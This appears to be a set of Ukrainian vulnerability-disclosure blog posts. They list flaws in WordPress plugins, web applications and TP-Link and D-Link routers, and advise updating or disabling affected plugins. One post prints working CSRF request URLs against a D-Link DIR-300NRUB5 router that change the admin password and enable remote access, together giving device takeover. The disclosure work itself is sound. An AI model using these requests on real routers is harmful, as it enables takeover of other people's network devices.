Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Appointment Booking Calendar, Instagram, User Meta Manager, Newsletter Pro. Для котрих з’явилися експлоіти.

• WordPress Appointment Booking Calendar 1.1.24 SQL Injection (деталі)
• WordPress Instagram 1.1.0 Cross Site Scripting (деталі)
• WordPress User Meta Manager 3.4.6 Privilege Escalation (деталі)
• WordPress User Meta Manager 3.4.6 Blind SQL Injection (деталі)
• WordPress Newsletter Pro 2.5.3.3 Open Redirect (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У грудні, 26.12.2016, я знайшов Cross-Site Scripting та Cross-Site Request Forgery уразливості в TL-WR841ND. Це Wireless Router і AP.

Раніше я писав про уразливості в мережевих пристроях даної компанії, зокрема в TP-Link TL-WR941N та TP-Link TL-WR841N.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

В даній добірці уразливості в веб додатках:

• neuroML - Multiple Vulnerabilities (деталі)
• Reflected Cross-Site Scripting (XSS) in SearchBlox (деталі)
• BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability (деталі)
• SQL Injection in TYPO3 Extension Akronymmanager (деталі)
• RCE, domain admin creds leakage and more in BMC Track-It! (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Appointment Booking Calendar, Ultimate CSV Importer, Simple Add Pages Or Posts, Comment Rating. Для котрих з’явилися експлоіти.

• WordPress Appointment Booking Calendar 1.1.23 Shortcode SQL Injection (деталі)
• WordPress Ultimate CSV Importer 3.8.6 Cross Site Scripting (деталі)
• WordPress Appointment Booking Calendar 1.1.24 Escalation / XSS (деталі)
• WordPress Simple Add Pages Or Posts 1.6 Cross Site Request Forgery (деталі)
• WordPress Comment Rating 1.5.0 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• HP Operations Manager for UNIX, Remote Code Execution (деталі)
• Multiple Vulnerabilities in ISPConfig (деталі)
• drupal7 security update (деталі)
• OS Command Injection in Vesta Control Panel (деталі)
• HP Records Manager, Remote Cross-Site Scripting (XSS) (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах No External Links, Commentator, Extredj, Appointment Booking Calendar, Easy Gallery. Для котрих з’явилися експлоіти.

• WordPress No External Links 2.6.3 / 2.7.1 Open Redirect (деталі)
• WordPress Commentator 2.5.2 Cross Site Scripting (деталі)
• WordPress Extredj Open Redirection (деталі)
• WordPress Appointment Booking Calendar 1.1.23 SQL Injection (деталі)
• WordPress Easy Gallery 4.1.4 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

17.03.2016

У січні, 29.01.2015, я виявив Cross-Site Request Forgery уразливості в D-Link DIR-300. Це Wireless Router і AP.

Раніше я писав про уразливості в пристроях даної компанії, зокрема в D-Link DIR-300 та D-Link DGS-3200-16.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

30.09.2017

Після попередніх AoF, BF та CSRF уразливостей, тримайте нові Cross-Site Request Forgery дірки. Для захоплення контролю над пристроєм потрібно зробити декілька CSRF запитів: змінити пароль, логін при цьому фіксований (це раніше згадана AoF уразливість), увімкнути віддалений доступ та зберегти налаштування.

Cross-Site Request Forgery (WASC-09):

Зміна паролю адміна:

http://site/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password|

Додати налаштування для увімкнення віддаленого доступу:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=-1

Зміна налаштування для увімкнення віддаленого доступу:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=1

Видалення налаштування віддаленого доступу:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=1

Збереження всіх змінених налаштувань пристрою:

http://site/index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y

Уразлива версія D-Link DIR-300NRUB5, Firmware 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою.

В даній добірці уразливості в веб додатках:

• HP System Management Homepage (SMH) on Linux and Windows, Multiple Vulnerabilities (деталі)
• SilverStripe CMS Unvalidated Redirect & XSS vulnerabilities (деталі)
• Kibana vulnerability (деталі)
• Arbitrary File Disclosure and Open Redirect in Bonita BPM (деталі)
• HP Sprinter, Remote Execution of Code (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах NextGEN Gallery, AzonPop, JS External Link Info, Symposium Pro Social Network, Tubepress. Для котрих з’явилися експлоіти.

• WordPress NextGEN Gallery 2.1.15 Cross Site Scripting / Path Traversal (деталі)
• WordPress AzonPop 1.0.0 SQL Injection (деталі)
• WordPress JS External Link Info 1.21 Open Redirect (деталі)
• WordPress Symposium Pro Social Network 16.1 Cross Site Scripting (деталі)
• WordPress Tubepress 2 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Ultra Electronics / AEP Networks - SSL VPN (Netilla / Series A / Ultra Protect) Vulnerabilities (деталі)
• Concrete5 <= 5.7.3.1 (sendmail) Remote Code Execution Vulnerability (деталі)
• Symphony CMS XSS Vulnerability (деталі)
• SilverStripe CMS Unvalidated Redirect & XSS vulnerabilities (деталі)
• HP-UX running System Management Homepage (SMH), Remote Cross-Site Request Forgery (деталі)